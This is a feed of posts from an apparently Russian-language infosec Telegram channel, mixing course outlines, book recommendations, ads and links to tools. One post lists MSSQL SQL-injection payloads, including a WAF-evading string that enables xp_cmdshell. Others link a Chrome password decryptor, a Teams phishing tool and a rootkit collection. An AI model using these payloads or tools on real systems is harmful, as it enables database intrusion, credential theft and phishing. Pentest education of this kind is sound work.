-
Обратная связь. Вопросы, предложения, пожелания, жалобы - @Social_Engineering_bot
🔑 Decrypt Chrome Passwords.
• Инструмент для расшифровки пароля в Chrome, сохраненного на ПК. Протестировано только в ОС Windows.
• https://github.com/ohyicong/decrypt-chrome-passwords
#infosec
👩💻 Ansible на русском языке.
• Автоконфигурирование для DevOps;
• Установка на Ubuntu и CentOS;
• Установка на Amazon Linux через PIP;
• Подключение к серверам LINUX;
• Подключение к серверам WINDOWS;
• Правила создания файла Inventory;
• Запуск Ad-Hoc Команд;
• Правила Формата YAML;
• Перенос переменных в group_vars;
• Первые Playbook;
• Переменные - Debug, Set_fact, Register;
• Блоки и Условия – Block-When;
• Циклы – Loop, With_Items, Until, With_fileglob;
• Шаблоны - Jinja Template;
• Создание Ролей - Roles;
• Внешние переменные - extra-vars;
• Использование Import, Include;
• Перенаправление выполнения Task из Playbook на определённый
• Перехват и Контроль ошибок;
• Хранение Секретов - ansible-vault;
• Dynamic Inventory AWS - Amazon Web Services - ec2.py;
• Создание ресурсов AWS - Amazon Web Services.
#Ansible #DevOps
📚 Database Security.
• Дата выхода: 2022 год.
• Рейтинг: ⭐⭐⭐⭐⭐ (5 out of 5)
• VT.• Database Security: Problems and Solutions describes and demonstrates how to resolve database security issues at the design, implementation, and production phases. Database securityconsiders and implements those measures or controls in more specific ways than are generally realized in the broader realm of information security. Database security also involves other confidentiality approaches, such as techniques for account credential management, techniques to manage access to data, as well as techniques to manage the types of access.
🧩 Софт для чтения.
#Eng #Database #Security
🗺 GeoPincer.
• OpenStreetMap Overpass Script to find locations with a given set of nodes.
• https://github.com/tloja/GeoPincer
#OSINT
💻 Курс по SQL для начинающих.
• Серия уроков по PostgreSQL. Все те знания, которые вы получите на курсе легко применимы и к другим СУБД, таким как MySQL, Microsoft SQL Server, Oracle.
• Введение в PostgreSQL;
• Базовые SELECT запросы;
• Соединения (JOIN);
• Подзапросы в SQL;
• DDL: создание БД, таблиц и их модификация;
• Проектирование и нормализация Базы Данных (БД);
• Представления в SQL;
• Логика с CASE и COALESCE в Функции SQL;
• Функции SQL;
• Функции pl/pgSQL;
• Ошибки их обработка в SQL (исключения);
• Индексы в PostgreSQL;
• Индексы в PostgreSQL # Виды индексов SQL # EXPLAIN, ANALYZE;
• Индексы в PostgreSQL # Создание индексов на практике # EXPLAIN, ANALYZE # GIN.
#Курс #SQL
👨💻 RowPress — атака на оперативную память.
• Новый метод атаки через «простукивание ячеек памяти».
• https://www.kaspersky.ru/blog/rowpress-method/35737/
• https://arxiv.org/pdf/2306.17061.pdf
#infosec
⬆️ Priv2Admin.
• Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.
• https://github.com/gtworek/Priv2Admin
#пентест #Red_Team
📖 Mastering Defensive Security.
• Дата выхода: 2022 год.
• Рейтинг: ⭐⭐⭐⭐⭐ (5 out of 5)
• VT.• Become well versed with concepts related to defensive #security;• Discover strategies and tools to secure the most vulnerable factor – the user;• Get hands-on experience using and configuring the best security tools;• Understand how to apply hardening techniques in #Windows and #Unix environments;• Leverage malware analysis and forensics to enhance your security strategy;• Secure Internet of Things (#IoT) implementations;• Enhance the security of web applications and cloud deployments.
🧩 Софт для чтения.
#Security #Eng
🔥 Онлайн-курс по углубленному изучению ИБ и DevSecOps от OTUS
Оставьте заявку на курс «Внедрение и работа в DevSecOps» и пройдите вступительный тест оценив свой уровень знаний информационной безопасности.
Оставить заявку: https://otus.pw/biLP/
💣 Оставите заявку и бонусом получите:
✔️ Подборку открытых видео уроков "Роль уязвимостей"
✔️ Доступ к лучшим открытым урокам прошлых наборов курса
✔️ Скидку на прохождение онлайн курса «Внедрение и работа в DevSecOps»
Курс доступен в рассрочку.
Нативная интеграция. Информация о продукте www.otus.ru
🔴Burp Suite for Pentester.
• Web Scanner & Crawler;
• Fuzzing with Intruder (Part3);
• Fuzzing with Intruder (Part2);
• Fuzzing with Intruder (Part1);
• XSS Validator;
• Configuring Proxy;
• Burp Collaborator;
• HackBar;
• Burp Sequencer;
• Turbo Intruder;
• Engagement Tools Tutorial in Burp suite;
• Payload Processing Rule in Burp suite (Part2);
• Payload Processing Rule in Burp suite (Part1);
• Beginners Guide to Burpsuite Payloads (Part2);
• Beginners Guide to Burpsuite Payloads (Part1);
• Burpsuite Encoder & Decoder Tutorial;
• Active Scan++;
• Software Vulnerability Scanner;
• Burp’s Project Management;
• Repeater.
#infosec #cybersecurity #CheatSheet #burpsuite
👨💻 Сетевой инженер - ответы на ключевые вопросы.
2:27 - Кто такой сетевой инженер?
5:35 - Выпускники каких вузов могут стать сетевым инженером?
6:23 - Где можно устроиться сетевым инженером?
9:24 - На какую зарплату можно рассчитывать?
12:56 - Ключевые навыки сетевого инженера?
15:41 - Какие сертификаты ценятся?
19:00 - С чего начать?
23:02 - Какие перспективы развития?
24:24 - Совет студентам.
#network
📚 Learn Wireshark.
• Дата выхода: 2022 год.
• Рейтинг: ⭐⭐⭐⭐⭐ (5 out of 5)
• VT.
What you will learn:• Master network analysis and troubleshoot anomalies with Wireshark;• Discover the importance of baselining network traffic;• Correlate the OSI model with frame formation in Wireshark;• Narrow in on specific traffic by using display and capture filters;• Conduct deep packet analysis of common protocols: IP, TCP, and ARP;• Understand the role and purpose of;• ICMP, DNS, HTTP, and DHCP;• Create a custom configuration profile and personalize the interface;• Create I/O and stream graphs to better visualize traffic.
🧩 Софт для чтения.
#Eng #network #Wireshark
Pentest Awards продлили прием заявок до 23 июля!
Премия для этичных хакеров продолжает поиск самых выдающихся работ. Всего в премии 6 номинаций, относящихся к разным стадиям имитации хакерских атак. Заявка — это рассказ автора о лучшем проекте в свободной форме.
За первое место дарят MacBook, за второе — iPhone, за третье — Apple Watch. И это для каждой номинаций. Значительный вклад в призовой фонд внесла консалтинговая ИБ-компания Veles. Партнеры дарят победителям билеты на OFFZONE и гранты на обучения любым курсам CyberED.
Для всех победителей организаторы создали уникальную NFT коллекцию, всего 18 неповторимых изображений. Аналоговые награды тоже будут — эксклюзивные статуэтки в виде пантеры — маскота проекта.
❗️ Торопитесь отправлять заявки, осталось не много времени — https://award.awillix.ru/
В MSSQL есть незадокументированная фича, которая может помочь при пентесте.
";" - символ, который мы привыкли использовать для разделения нескольких запросов в SQL-синтаксисе (если речь не идет о subquery).
И какой-нибудь PostgreSQL или MySQL запнется о конструкции, вроде
SELECT 'A' SELECT 'B' SELECT 'C'и поругается, что мы нарушили синтаксис, не указав нужный терминатор. Так как он ожидает, что мы разделим эти запросы точкой с запятой.
SELECT * FROM test WHERE id = 1 WAITFOR DELAY '0:0:5'
use[tempdb]create/**/table[test]([id]int)insert[test]values(1)select[id]from[test]drop/**/table[test].или еще один пример с изменением конфигурации, чтобы можно было выполнять xp_cmdshell.
admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
Это полезно тем, что некоторые WAF могут увидеть такие строки, посчитать их безопасными и пропустить запросы. Например, AWS WAF, в который и был сдан такой баг.
Читать полностью…
📚 Network Security and Cryptography.
• Дата выхода: 2022 год.
• Рейтинг: ⭐⭐⭐⭐⭐ (5 out of 5)
• VT.
What you will learn:• Includes a new chapter on artificial intelligence security, the latest material on emerging technologies related to IoT, cloud computing, smart grid, big data analytics, blockchain, and more;• Features separate chapters on the mathematics related to network security and cryptography;• Introduces basic concepts in computer networks including classical cipher schemes, public key cryptography, authentication schemes, pretty good privacy, Internet security services, and system security;• Includes end of chapter review questions.
🧩 Софт для чтения.
#Eng #security
Безопасник, который не умеет использовать командную строку bash – так себе специалист.
Если посетить несколько собеседований уровня от миддл, то можно убедиться, что вопросы про опыт работы в консоли появляются довольно часто.
Сходу научиться всем командам bash нереально – их очень много.
К счастью, появился канал BashMaster, в котором каждый день можно узнавать по одной небольшой связке команд и сразу же внедрять их в свою работу.
Подпишись, освоишь bash на изи 👍
👨💻 Как стать DevOps Инженером с Нуля, что учить и в каком порядке.
00:00 – 1. Вступление;
01:06 – 2. Всевозможные компетенции DevOps инженера;
10:35 – 3. Кому проще стать DevOps;
15:01 – 4. Что учить по минимуму и в каком порядке;
30:04 – 4.1. Основы Network TCP/IP;
31:36 – 4.2. Администрирование Windows;
34:09 – 4.3. Основы Linux;
35:54 – 4.4. Ansible;
36:48 – 4.5. Git;
37:37 – 4.6. GitHub;
38:04 – 4.7. Jenkins;
38:23 – 4.8. Docker+DockerHub;
38:44 – 4.9. Cloud Platform AWS;
42:10 – 4.10. CloudFormation + Terraform;
43:25 – 5. Курс DevOps Engineering в JohnBryce, Израиль;
49:12 – 6. Как стать профессиональным DevOps инженером;
54:24 – 7. Эпилог.
🧷 https://youtu.be/AxCgZ7yUKrU
#Видео #RU #DevOps
📚 Занимайся хакингом как невидимка.
• Дата выхода: 2022 год.
• Рейтинг: ⭐⭐⭐⭐⭐ (5 out of 5)
• VT.
• Обучитесь секретным навыкам Спарка Флоу, проникающего в самые отдаленные уголки облачных инфраструктур. Наблюдайте за каждым его шагом, от разведки до проникновения, когда он атакует политическую консалтинговую фирму, собирающую данные избирателей.
• Цель вымышленная, но уязвимости взяты из реальной жизни. Испытайте вместе с ним всю гамму ощущений настоящего хакера – от разочарования и чувства бессилия, когда взлом зашел в тупик, до восторга и гордости после триумфального достижения цели.
🧩 Софт для чтения.
#RU #ИБ #Пентест
Бесплатный курс: старт в кибербезопасности
В прошлом году число кибератак в России взлетело на 80%. Поэтому информационная безопасность становится ключевым приоритетом для многих компаний — спрос на специалистов по кибербезопасности резко вырос.
На бесплатном курсе вы попробуете себя в качестве такого специалиста и решите его настоящие задачи — найдёте уязвимости в веб-сервисах и настроите компоненты операционной системы для обеспечения безопасности.
Узнайте, с чего начать карьеру в перспективном направлении: https://netolo.gy/bQyL
Реклама. ООО «Нетология» LatgBuUJL
📚 Guide to Managing and Troubleshooting Networks Lab Manual.
• Дата выхода: 2022 год.
• Рейтинг: ⭐⭐⭐⭐⭐ (5 out of 5)
• VT.• 80+ lab exercises challenge you to solve problems based on realistic case studies;• Step-by-step scenarios require you to think critically;• Lab Analysis tests measure your understanding of lab results;• Key Term Quizzes help build your vocabulary.
🧩 Софт для чтения.
#Network #Eng
👨💻 Attacking Active Directory: 0 to 0.9
• https://zer1t0.gitlab.io/posts/attacking_ad/
#AD #пентест
Какой бизнес сегодня больше всего страдает от киберугроз — крупный, средний или малый?
Для больших компаний цена успешной атаки — это репутация, а для маленьких — это выживание. Чтобы увести у микробизнеса базу клиентов, достаточно одной атаки.
Поэтому у маленьких компаний один путь — выбрать наиболее критичный актив (та же база клиентов или, например, сайт) и обратиться к сервис-провайдеру, чтобы он обеспечил его защиту.
Ответы на эти и другие вопросы, связанные с ИБ, вы можете найти в моем новом интервью для РБК.
ⓒ /channel/naumovaevgeniya
👨💻 Используем tcpdump для анализа и перехвата сетевого трафика.
• https://habr.com/ru/post/531170/
#tcpdump #network
🏹 Web Hacker's Weapons.
• A collection of cool tools used by Web hackers. Happy hacking , Happy bug-hunting.
• https://github.com/hahwul/WebHackersWeapons
#infosec
📚 Cybersecurity – Attack and Defense Strategies.
• Дата выхода: 2022 год.
• Рейтинг: ⭐⭐⭐⭐⭐ (5 out of 5)
• VT.
What you will learn:• Learn to mitigate, recover from, and prevent future cybersecurity events;• Understand security hygiene and value of prioritizing protection of your workloads;• Explore physical and virtual network segmentation, cloud network visibility, and Zero Trust considerations;• Adopt new methods to gather cyber intelligence, identify risk, and demonstrate impact with Red/Blue Team strategies;• Explore legendary tools such as Nmap and Metasploit to supercharge your Red Team;• Discover identity security and how to perform policy enforcement;• Integrate threat detection systems into your SIEM solutions;• Discover the MITRE ATT&CK Framework and open-source tools to gather intelligence.
🧩 Софт для чтения.
#Eng #Cybersecurity #Red_Team #Nmap #Metasploit #network #cloud #security
awesome-linux-rootkits: https://github.com/milabs/awesome-linux-rootkits
#linux #rootkits
👩💻 Командная оболочка PowerShell.
• Рекомендация и учебная площадка;
• Установка и обновление PowerShell;
• Знакомство с оболочкой, настройка и навигация;
• Новые возможности и приятные мелочи;
• Справочная система ч.1;
• Справочная система ч.2;
• PowerShell ISE – это путь мастера;
• Адрес курсора, поставщики дисков и вывод информации;
• Манипуляция над объектами и билдер сценариев;
• Маски или как фильтровать запрос в PowerShell;
• Конвейер – тёмная сторона.
#PowerShell
📖 TeamsPhisher.
• TeamsPhisher is a Python3 program that facilitates the delivery of phishing messages and attachments to Microsoft Teams users whose organizations allow external communications.
• Give TeamsPhisher an attachment, a message, and a list of target Teams users. It will upload the attachment to the sender's Sharepoint, and then iterate through the list of targets.
• https://github.com/Octoberfest7/TeamsPhisher
#Teams #Фишинг
📚 CompTIA Network+ Certification All-in-One Exam Guide.
• Дата выхода: 2022 год.
• Рейтинг: ⭐⭐⭐⭐⭐ (5 out of 5)
• VT.• Network architectures;• Cabling and topology;• Ethernet basics;• Network installation;• TCP/IP applications and network protocols;• Routing;• Network naming;• Advanced networking devices;• IPv6;• Remote connectivity;• Wireless networking;• Virtualization and cloud computing;• Mobile networking;• Network operations;• Managing risk;• Network security;• Network monitoring and troubleshooting.
🧩 Софт для чтения.
#Network #Eng